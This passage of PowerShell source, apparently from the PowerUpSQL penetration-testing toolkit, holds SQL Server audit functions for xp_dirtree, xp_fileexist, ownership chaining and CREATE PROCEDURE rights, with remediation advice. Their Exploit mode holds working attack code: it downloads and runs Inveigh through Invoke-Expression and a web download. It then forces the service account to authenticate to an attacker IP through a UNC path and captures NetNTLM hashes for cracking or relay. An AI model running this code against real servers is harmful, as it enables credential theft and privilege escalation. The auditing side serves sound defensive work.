the Public role by default in SQL Server 2000-2014. Xp_dirtree can be used to force the SQL Server service account to authenticate to a remote attacker. The service account password hash can then be captured + cracked or relayed to gain unauthorized access to systems. This also means xp_dirtree can be used to escalate a lower privileged user to sysadmin when a machine or managed account isnt being used. Thats because the SQL Server service account is a member of the sysadmin role in SQL Server 2000-2014, by default. Remediation : Remove EXECUTE privileges on the XP_DIRTREE procedure for non administrative logins and roles. Example command: REVOKE EXECUTE ON xp_dirtree to Public Severity : Medium IsVulnerable : Yes IsExploitable : Yes Exploited : Yes ExploitCmd : Crack the password hash offline or relay it to another system. Details : The public principal has EXECUTE privileges on XP_DIRTREE procedure in the master database. Recovered password hash! Hash type = NetNTLMv1;Hash = SQLSvcAcnt::Domain:0000000000000000400000000000000000000000000000000:1CEC319E75261CEC319E759E7511E1CEC319E753AB7D: Reference : https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/ Author : Scott Sutherland (@_nullbind), NetSPI 2016 .EXAMPLE PS C:\> Get-SQLInstanceDomain -Verbose | Invoke-SQLAuditPrivXpDirtree -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = "Don't output anything.")] [string]$NoOutput, [Parameter(Mandatory = $false, HelpMessage = 'Exploit vulnerable issues.')] [switch]$Exploit, [Parameter(Mandatory = $false, HelpMessage = 'IP that the SQL Server service will attempt to authenticate to, and password hashes will be captured from.')] [string]$AttackerIp, [Parameter(Mandatory = $false, HelpMessage = 'Time in second to way for hash to be captured.')] [int]$TimeOut = 5 ) Begin { # Table for output $TblData = New-Object -TypeName System.Data.DataTable $null = $TblData.Columns.Add('ComputerName') $null = $TblData.Columns.Add('Instance') $null = $TblData.Columns.Add('Vulnerability') $null = $TblData.Columns.Add('Description') $null = $TblData.Columns.Add('Remediation') $null = $TblData.Columns.Add('Severity') $null = $TblData.Columns.Add('IsVulnerable') $null = $TblData.Columns.Add('IsExploitable') $null = $TblData.Columns.Add('Exploited') $null = $TblData.Columns.Add('ExploitCmd') $null = $TblData.Columns.Add('Details') $null = $TblData.Columns.Add('Reference') $null = $TblData.Columns.Add('Author') } Process { # Status User Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Excessive Privilege - xp_dirtree" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if(-not $TestConnection) { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED." Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - xp_dirtree." Return } else { Write-Verbose -Message "$Instance : CONNECTION SUCCESS." } # Grab server information # Grab server, login, and role information $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $ComputerName = $ServerInfo.ComputerName $CurrentLogin = $ServerInfo.CurrentLogin $CurrentLoginRoles = Get-SQLServerRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PrincipalName $CurrentLogin -SuppressVerbose $CurrentPrincpalList = @() $CurrentPrincpalList += $CurrentLogin $CurrentPrincpalList += 'Public' $CurrentLoginRoles | ForEach-Object -Process { $CurrentPrincpalList += $_.RolePrincipalName } # -------------------------------------------- # Set function meta data for report output # -------------------------------------------- if($Exploit) { $TestMode = 'Exploit' } else { $TestMode = 'Audit' } $Vulnerability = 'Excessive Privilege - Execute xp_dirtree' $Description = 'xp_dirtree is a native extended stored procedure that can be executed by members of the Public role by default in SQL Server 2000-2014. Xp_dirtree can be used to force the SQL Server service account to authenticate to a remote attacker. The service account password hash can then be captured + cracked or relayed to gain unauthorized access to systems. This also means xp_dirtree can be used to escalate a lower privileged user to sysadmin when a machine or managed account isnt being used. Thats because the SQL Server service account is a member of the sysadmin role in SQL Server 2000-2014, by default.' $Remediation = 'Remove EXECUTE privileges on the XP_DIRTREE procedure for non administrative logins and roles. Example command: REVOKE EXECUTE ON xp_dirtree to Public' $Severity = 'Medium' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' $ExploitCmd = 'Crack the password hash offline or relay it to another system.' $Details = '' $Reference = 'https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # ----------------------------------------------------------------- # Check for the Vulnerability # Note: Typically a missing patch or weak configuration # ----------------------------------------------------------------- # Get users and roles that execute xp_dirtree $DirTreePrivs = Get-SQLDatabasePriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName master -SuppressVerbose | Where-Object -FilterScript { $_.ObjectName -eq 'xp_dirtree' -and $_.PermissionName -eq 'EXECUTE' -and $_.statedescription -eq 'grant' } # Update vulnerable status if($DirTreePrivs) { # Status user Write-Verbose -Message "$Instance : - At least one principal has EXECUTE privileges on xp_dirtree." $IsVulnerable = 'Yes' if($Exploit){ # Check if the current process has elevated privs # https://msdn.microsoft.com/en-us/library/system.security.principal.windowsprincipal(v=vs.110).aspx $CurrentIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent() $prp = New-Object -TypeName System.Security.Principal.WindowsPrincipal -ArgumentList ($CurrentIdentity) $adm = [System.Security.Principal.WindowsBuiltInRole]::Administrator $IsAdmin = $prp.IsInRole($adm) if(-not $IsAdmin) { Write-Verbose -Message "$Instance : - You do not have Administrator rights. Run this function as an Administrator in order to load Inveigh." $IAMADMIN = 'No' }else{ Write-Verbose -Message "$Instance : - You have Administrator rights. Inveigh will be loaded." $IAMADMIN = 'Yes' } } $DirTreePrivs | ForEach-Object -Process { $PrincipalName = $DirTreePrivs.PrincipalName # Check if current login can exploit $CurrentPrincpalList | ForEach-Object -Process { $PrincipalCheck = $_ if($PrincipalName -eq $PrincipalCheck -or $PrincipalName -eq 'public') { $IsExploitable = 'Yes' # Check for exploit flag if(($IAMADMIN -eq 'Yes') -and ($Exploit)) { # Attempt to load Inveigh from file #$InveighSrc = Get-Content .\scripts\Inveigh.ps1 -ErrorAction SilentlyContinue | Out-Null #Invoke-Expression($InveighSrc) # Get IP of current system if(-not $AttackerIp) { $AttackerIp = (Test-Connection -ComputerName -Count 1 | Select-Object -ExpandProperty Ipv4Address | Select-Object -Property IPAddressToString -ExpandProperty IPAddressToString) if($AttackerIp -eq '') { $AttackerIp = Get-WmiObject -Class win32_networkadapterconfiguration -Filter "ipenabled = 'True'" -ComputerName $env:COMPUTERNAME | Select-Object -First 1 -Property @{ Name = 'IPAddress' Expression = { [regex]$rx = '(\d{1,3}(\.?)){4}'; $rx.matches($_.IPAddress)[0].Value } } | Select-Object -Property IPaddress -ExpandProperty IPAddress -First 1 } } # Attempt to load Inveigh via reflection Invoke-Expression -Command (New-Object -TypeName system.net.webclient).downloadstring('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1') $TestIt = Test-Path -Path Function:\Invoke-Inveigh if($TestIt -eq 'True') { Write-Verbose -Message "$Instance : - Inveigh loaded." # Get IP of SQL Server instance $InstanceIP = [System.Net.Dns]::GetHostAddresses($ComputerName) # Start sniffing for hashes from that IP Write-Verbose -Message "$Instance : - Start sniffing..." $null = Invoke-Inveigh -HTTP N -NBNS Y -MachineAccounts Y -WarningAction SilentlyContinue -IP $AttackerIp # Randomized 5 character file name $path = (-join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_})) # Sent unc path to attacker's Ip Write-Verbose -Message "$Instance : - Inject UNC path to \\$AttackerIp\$path..." $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "xp_dirtree '\\$AttackerIp\$path'" -TimeOut 10 -SuppressVerbose # Sleep for $Timeout seconds to ensure that slow connections make it back to the listener Write-Verbose -Message "$Instance : - Sleeping for $TimeOut seconds to ensure the hash comes back" Start-Sleep -s $TimeOut # Stop sniffing and print password hashes $null = Stop-Inveigh Write-Verbose -Message "$Instance : - Stopped sniffing." $HashType = '' $Hash = '' [string]$PassCleartext = Get-Inveigh -Cleartext Y if($PassCleartext) { $HashType = 'Cleartext' $Hash = $PassCleartext } [string]$PassNetNTLMv1 = Get-Inveigh -NTLMv1 Y if($PassNetNTLMv1) { $HashType = 'NetNTLMv1' $Hash = $PassNetNTLMv1 } [string]$PassNetNTLMv2 = Get-Inveigh -NTLMv2 Y if($PassNetNTLMv2) { $HashType = 'NetNTLMv2' $Hash = $PassNetNTLMv2 } if($Hash) { # Update Status Write-Verbose -Message "$Instance : - Recovered $HashType hash:" Write-Verbose -Message "$Instance : - $Hash" $Exploited = 'Yes' $Details = "The $PrincipalName principal has EXECUTE privileges on the xp_dirtree procedure in the master database. Recovered password hash! Hash type = $HashType;Hash = $Hash" } else { # Update Status $Exploited = 'No' $Details = "The $PrincipalName principal has EXECUTE privileges on the xp_dirtree procedure in the master database. xp_dirtree Executed, but no password hash was recovered." } # Clear inveigh cache $null = Clear-Inveigh } else { Write-Verbose -Message "$Instance : - Inveigh could not be loaded." # Update status $Exploited = 'No' $Details = "The $PrincipalName principal has EXECUTE privileges on the xp_dirtree procedure in the master database, but Inveigh could not be loaded so no password hashes could be recovered." } } else { # Update status $Exploited = 'No' $Details = "The $PrincipalName principal has EXECUTE privileges on the xp_dirtree procedure in the master database." } } else { # Update status $IsExploitable = 'No' $Details = "The $PrincipalName principal has EXECUTE privileges the xp_dirtree procedure in the master database." } } # Add record $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } } else { Write-Verbose -Message "$Instance : - No logins were found with the EXECUTE privilege on xp_dirtree." } # Status User Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - XP_DIRTREE" } End { # Return data if ( -not $NoOutput) { Return $TblData } } } # --------------------------------------- # Invoke-SQLAuditPrivXpFileexist # --------------------------------------- # Author: Scott Sutherland Function Invoke-SQLAuditPrivXpFileexist { <# .SYNOPSIS Check if the current user has privileges to execute xp_fileexist extended stored procedure. If exploit option is used, the script will inject a UNC path to the attacker's IP and capture the SQL Server service account password hash using Inveigh. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER Exploit Exploit vulnerable issues. .PARAMETER AttackerIp IP that the SQL Server service will attempt to authenticate to, and password hashes will be captured from. .PARAMETER TimeOut Number of seconds to wait for authentication from target SQL Server. .EXAMPLE PS C:\> Invoke-SQLAuditPrivXpFileexist -Verbose -Instance SQLServer1\STANDARDDEV2014 -AttackerIp .EXAMPLE PS C:\> Get-SQLInstanceDomain -Verbose | Invoke-SQLAuditPrivXpFileexist -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = "Don't output anything.")] [string]$NoOutput, [Parameter(Mandatory = $false, HelpMessage = 'Exploit vulnerable issues.')] [switch]$Exploit, [Parameter(Mandatory = $false, HelpMessage = 'IP that the SQL Server service will attempt to authenticate to, and password hashes will be captured from.')] [string]$AttackerIp, [Parameter(Mandatory = $false, HelpMessage = 'Time in second to way for hash to be captured.')] [int]$TimeOut = 5 ) Begin { # Table for output $TblData = New-Object -TypeName System.Data.DataTable $null = $TblData.Columns.Add('ComputerName') $null = $TblData.Columns.Add('Instance') $null = $TblData.Columns.Add('Vulnerability') $null = $TblData.Columns.Add('Description') $null = $TblData.Columns.Add('Remediation') $null = $TblData.Columns.Add('Severity') $null = $TblData.Columns.Add('IsVulnerable') $null = $TblData.Columns.Add('IsExploitable') $null = $TblData.Columns.Add('Exploited') $null = $TblData.Columns.Add('ExploitCmd') $null = $TblData.Columns.Add('Details') $null = $TblData.Columns.Add('Reference') $null = $TblData.Columns.Add('Author') } Process { # Status User Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Excessive Privilege - xp_fileexist" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if(-not $TestConnection) { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED." Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - xp_fileexist." Return } else { Write-Verbose -Message "$Instance : CONNECTION SUCCESS." } # Grab server information # Grab server, login, and role information $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $ComputerName = $ServerInfo.ComputerName $CurrentLogin = $ServerInfo.CurrentLogin $CurrentLoginRoles = Get-SQLServerRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -PrincipalName $CurrentLogin -SuppressVerbose $CurrentPrincpalList = @() $CurrentPrincpalList += $CurrentLogin $CurrentPrincpalList += 'Public' $CurrentLoginRoles | ForEach-Object -Process { $CurrentPrincpalList += $_.RolePrincipalName } # -------------------------------------------- # Set function meta data for report output # -------------------------------------------- if($Exploit) { $TestMode = 'Exploit' } else { $TestMode = 'Audit' } $Vulnerability = 'Excessive Privilege - Execute xp_fileexist' $Description = 'xp_fileexist is a native extended stored procedure that can be executed by members of the Public role by default in SQL Server 2000-2014. Xp_dirtree can be used to force the SQL Server service account to authenticate to a remote attacker. The service account password hash can then be captured + cracked or relayed to gain unauthorized access to systems. This also means xp_dirtree can be used to escalate a lower privileged user to sysadmin when a machine or managed account isnt being used. Thats because the SQL Server service account is a member of the sysadmin role in SQL Server 2000-2014, by default.' $Remediation = 'Remove EXECUTE privileges on the xp_fileexist procedure for non administrative logins and roles. Example command: REVOKE EXECUTE ON xp_fileexist to Public' $Severity = 'Medium' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' $ExploitCmd = 'Crack the password hash offline or relay it to another system.' $Details = '' $Reference = 'https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # ----------------------------------------------------------------- # Check for the Vulnerability # Note: Typically a missing patch or weak configuration # ----------------------------------------------------------------- # Get users and roles that execute xp_fileexist $DirTreePrivs = Get-SQLDatabasePriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName master -SuppressVerbose | Where-Object -FilterScript { $_.ObjectName -eq 'xp_fileexist' -and $_.PermissionName -eq 'EXECUTE' -and $_.statedescription -eq 'grant' } # Update vulnerable status if($DirTreePrivs) { # Status user Write-Verbose -Message "$Instance : - The $PrincipalName principal has EXECUTE privileges on xp_fileexist." $IsVulnerable = 'Yes' $DirTreePrivs | ForEach-Object { $PrincipalName = $DirTreePrivs.PrincipalName # Check if current login can exploit $CurrentPrincpalList | ForEach-Object { $PrincipalCheck = $_ if($PrincipalName -eq $PrincipalCheck) { $IsExploitable = 'Yes' # Check if the current process has elevated privs # https://msdn.microsoft.com/en-us/library/system.security.principal.windowsprincipal(v=vs.110).aspx $CurrentIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent() $prp = New-Object -TypeName System.Security.Principal.WindowsPrincipal -ArgumentList ($CurrentIdentity) $adm = [System.Security.Principal.WindowsBuiltInRole]::Administrator $IsAdmin = $prp.IsInRole($adm) if (-not $IsAdmin) { Write-Verbose -Message "$Instance : - You do not have Administrator rights. Run this function as an Administrator in order to load Inveigh." $IAMADMIN = 'No' } else { Write-Verbose -Message "$Instance : - You have Administrator rights. Inveigh will be loaded." $IAMADMIN = 'Yes' } # Get IP of current system if(-not $AttackerIp) { $AttackerIp = (Test-Connection -ComputerName -Count 1 | Select-Object -ExpandProperty Ipv4Address | Select-Object -Property IPAddressToString -ExpandProperty IPAddressToString) if($AttackerIp -eq '') { $AttackerIp = Get-WmiObject -Class win32_networkadapterconfiguration -Filter "ipenabled = 'True'" -ComputerName $env:COMPUTERNAME | Select-Object -First 1 -Property @{ Name = 'IPAddress' Expression = { [regex]$rx = '(\d{1,3}(\.?)){4}'; $rx.matches($_.IPAddress)[0].Value } } | Select-Object -Property IPaddress -ExpandProperty IPAddress -First 1 } } # Check for exploit flag if($IAMADMIN -eq 'Yes') { # Attempt to load Inveigh from file #$InveighSrc = Get-Content .\scripts\Inveigh.ps1 -ErrorAction SilentlyContinue #Invoke-Expression($InveighSrc) # Attempt to load Inveigh via reflection Invoke-Expression -Command (New-Object -TypeName system.net.webclient).downloadstring('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1') $TestIt = Test-Path -Path Function:\Invoke-Inveigh if($TestIt -eq 'True') { Write-Verbose -Message "$Instance : - Inveigh loaded." # Get IP of SQL Server instance $InstanceIP = [System.Net.Dns]::GetHostAddresses($ComputerName) # Start sniffing for hashes from that IP Write-Verbose -Message "$Instance : - Start sniffing..." $null = Invoke-Inveigh -HTTP N -NBNS Y -MachineAccounts Y -WarningAction SilentlyContinue -IP $AttackerIp # Randomized 5 character file name $path = (-join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_})) # Sent unc path to attacker's Ip Write-Verbose -Message "$Instance : - Inject UNC path to \\$AttackerIp\$path..." $null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "xp_fileexist '\\$AttackerIp\$path'" -TimeOut 10 -SuppressVerbose # Sleep for $Timeout seconds to ensure that slow connections make it back to the listener Write-Verbose -Message "$Instance : - Sleeping for $TimeOut seconds to ensure the hash comes back" Start-Sleep -s $TimeOut # Stop sniffing and print password hashes $null = Stop-Inveigh Write-Verbose -Message "$Instance : - Stopped sniffing." $HashType = '' $Hash = '' [string]$PassCleartext = Get-Inveigh -Cleartext Y if($PassCleartext) { $HashType = 'Cleartext' $Hash = $PassCleartext } [string]$PassNetNTLMv1 = Get-Inveigh -NTLMv1 Y if($PassNetNTLMv1) { $HashType = 'NetNTLMv1' $Hash = $PassNetNTLMv1 } [string]$PassNetNTLMv2 = Get-Inveigh -NTLMv2 Y if($PassNetNTLMv2) { $HashType = 'NetNTLMv2' $Hash = $PassNetNTLMv2 } if($Hash) { # Update Status Write-Verbose -Message "$Instance : - Recovered $HashType hash:" Write-Verbose -Message "$Instance : - $Hash" $Exploited = 'Yes' $Details = "The $PrincipalName principal has EXECUTE privileges on xp_fileexist procedure in the master database. Recovered password hash! Hash type = $HashType;Hash = $Hash" } else { # Update Status $Exploited = 'No' $Details = "The $PrincipalName principal has EXECUTE privileges on xp_fileexist procedure in the master database. xp_fileexist Executed, but no password hash was recovered." } # Clear inveigh cache $null = Clear-Inveigh } else { Write-Verbose -Message "$Instance : - Inveigh could not be loaded." # Update status $Exploited = 'No' $Details = "The $PrincipalName principal has EXECUTE privileges on xp_fileexist procedure in the master database, but Inveigh could not be loaded so no password hashes could be recovered." } } else { # Update status $Exploited = 'No' $Details = "The $PrincipalName principal has EXECUTE privileges on xp_fileexist procedure in the master database." } } else { # Update status $IsExploitable = 'No' $Details = "The $PrincipalName principal has EXECUTE privileges on xp_fileexist procedure in the master database." } } # Add record $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } }else{ Write-Verbose -Message "$Instance : - No logins were found with the EXECUTE privilege on xp_fileexist." } } End { # Status User Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - xp_fileexist" # Return data if ( -not $NoOutput) { Return $TblData } } } # --------------------------------------- # Invoke-SQLAuditPrivDbChaining # --------------------------------------- # Author: Scott Sutherland Function Invoke-SQLAuditPrivDbChaining { <# .SYNOPSIS Check if data ownership chaining is enabled at the server or databases levels. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER NoDefaults Don't return information for default databases. .PARAMETER NoOutput Don't return output. .PARAMETER Exploit Exploit vulnerable issues. .EXAMPLE PS C:\> Invoke-SQLAuditPrivDbChaining -Instance SQLServer1\STANDARDDEV2014 ComputerName : NETSPI-283-SSU Instance : NETSPI-283-SSU\STANDARDDEV2014 Vulnerability : Excessive Privilege - Database Ownership Chaining Description : Ownership chaining was found enabled at the server or database level. Enabling ownership chaining can lead to unauthorized access to database resources. Remediation : Configured the affected database so the 'is_db_chaining_on' flag is set to 'false'. A query similar to 'ALTER DATABASE Database1 SET DB_CHAINING ON' is used enable chaining. A query similar to 'ALTER DATABASE Database1 SET DB_CHAINING OFF;' can be used to disable chaining. Severity : Low IsVulnerable : Yes IsExploitable : No Exploited : No ExploitCmd : There is not exploit available at this time. Details : The database testdb was found configured with ownership chaining enabled. Reference : https://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx,https://msdn.microsoft.com/en-us/library/bb669059(v=vs.110).aspx Author : Scott Sutherland (@_nullbind), NetSPI 2016 .EXAMPLE PS C:\> Get-SQLInstanceDomain | Invoke-SQLAuditPrivDbChaining -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Only select non default databases.')] [switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = "Don't output anything.")] [switch]$NoOutput, [Parameter(Mandatory = $false, HelpMessage = 'Exploit vulnerable issues.')] [switch]$Exploit ) Begin { # Table for output $TblData = New-Object -TypeName System.Data.DataTable $null = $TblData.Columns.Add('ComputerName') $null = $TblData.Columns.Add('Instance') $null = $TblData.Columns.Add('Vulnerability') $null = $TblData.Columns.Add('Description') $null = $TblData.Columns.Add('Remediation') $null = $TblData.Columns.Add('Severity') $null = $TblData.Columns.Add('IsVulnerable') $null = $TblData.Columns.Add('IsExploitable') $null = $TblData.Columns.Add('Exploited') $null = $TblData.Columns.Add('ExploitCmd') $null = $TblData.Columns.Add('Details') $null = $TblData.Columns.Add('Reference') $null = $TblData.Columns.Add('Author') } Process { # Status User Write-Verbose -Message "$Instance : START VULNERABILITY CHECK: Excessive Privilege - Database Ownership Chaining" # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if(-not $TestConnection) { # Status user Write-Verbose -Message "$Instance : CONNECTION FAILED." Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Database Ownership Chaining." Return } else { Write-Verbose -Message "$Instance : CONNECTION SUCCESS." } # Grab server information $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $CurrentLogin = $ServerInfo.CurrentLogin $ComputerName = $ServerInfo.ComputerName # -------------------------------------------- # Set function meta data for report output # -------------------------------------------- if($Exploit) { $TestMode = 'Exploit' } else { $TestMode = 'Audit' } $Vulnerability = 'Excessive Privilege - Database Ownership Chaining' $Description = 'Ownership chaining was found enabled at the server or database level. Enabling ownership chaining can lead to unauthorized access to database resources.' $Remediation = "Configured the affected database so the 'is_db_chaining_on' flag is set to 'false'. A query similar to 'ALTER DATABASE Database1 SET DB_CHAINING ON' is used enable chaining. A query similar to 'ALTER DATABASE Database1 SET DB_CHAINING OFF;' can be used to disable chaining." $Severity = 'Low' $IsVulnerable = 'No' $IsExploitable = 'No' $Exploited = 'No' $ExploitCmd = 'There is not exploit available at this time.' $Details = '' $Reference = 'https://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx,https://msdn.microsoft.com/en-us/library/bb669059(v=vs.110).aspx ' $Author = 'Scott Sutherland (@_nullbind), NetSPI 2016' # ----------------------------------------------------------------- # Check for the Vulnerability # Note: Typically a missing patch or weak configuration # ----------------------------------------------------------------- # Select links configured with static credentials if($NoDefaults) { $ChainDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -NoDefaults -SuppressVerbose | Where-Object -FilterScript { $_.is_db_chaining_on -eq 'True' } } else { $ChainDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.is_db_chaining_on -eq 'True' } } # Update vulnerable status if($ChainDatabases) { $IsVulnerable = 'Yes' $ChainDatabases | ForEach-Object -Process { $DatabaseName = $_.DatabaseName Write-Verbose -Message "$Instance : - The database $DatabaseName has ownership chaining enabled." $Details = "The database $DatabaseName was found configured with ownership chaining enabled." $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } } else { Write-Verbose -Message "$Instance : - No non-default databases were found with ownership chaining enabled." } # Check for server wide setting $ServerCheck = Get-SQLServerConfiguration -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Name -like '*chain*' -and $_.config_value -eq 1 } if($ServerCheck) { $IsVulnerable = 'Yes' Write-Verbose -Message "$Instance : - The server configuration 'cross db ownership chaining' is set to 1. This can affect all databases." $Details = "The server configuration 'cross db ownership chaining' is set to 1. This can affect all databases." $null = $TblData.Rows.Add($ComputerName, $Instance, $Vulnerability, $Description, $Remediation, $Severity, $IsVulnerable, $IsExploitable, $Exploited, $ExploitCmd, $Details, $Reference, $Author) } # ----------------------------------------------------------------- # Check for exploit dependancies # Note: Typically secondary configs required for dba/os execution # ----------------------------------------------------------------- # $IsExploitable = "No" or $IsExploitable = "Yes" # Check if the link is alive and verify connection + check if sysadmin # ----------------------------------------------------------------- # Exploit Vulnerability # Note: Add the current user to sysadmin fixed server role # ----------------------------------------------------------------- # $Exploited = "No" or $Exploited = "Yes" # select * from openquery("server\intance",'EXEC xp_cmdshell whoami WITH RESULT SETS ((output VARCHAR(MAX)))') # Also, recommend link crawler module # Status User Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK: Excessive Privilege - Database Ownership Chaining" } End { # Return data if ( -not $NoOutput) { Return $TblData } } } # --------------------------------------- # Invoke-SQLAuditPrivCreateProcedure # --------------------------------------- # Author: Scott Sutherland Function Invoke-SQLAuditPrivCreateProcedure { <# .SYNOPSIS Check if the current login has the CREATE PROCEDURE permission. Attempt to leverage to obtain sysadmin privileges. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER NoOutput Don't output anything. .PARAMETER Exploit Exploit vulnerable issues .EXAMPLE PS C:\> Get-SQLInstanceLocal | Invoke-SQLAuditPrivCreateProcedure -Username evil -Password Password123! ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 Vulnerability : PERMISSION - CREATE PROCEDURE Description : The login has privileges to create stored procedures in one or more databases. This may allow the login to escalate privileges within the database. Remediation : If the permission is not required remove it. Permissions are granted with a command like: GRANT CREATE PROCEDURE TO user, and can be removed with a command like: REVOKE CREATE PROCEDURE TO user. Severity : Medium IsVulnerable : Yes IsExploitable : No Exploited : No ExploitCmd : No exploit is currently available that will allow evil to become a sysadmin. Details : The evil principal has the CREATE PROCEDURE permission in the testdb database. Reference : https://msdn.microsoft.com/en-us/library/ms187926.aspx?f=255&MSPPError=-2147217396 Author : Scott Sutherland (@_nullbind), NetSPI 2016 #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, 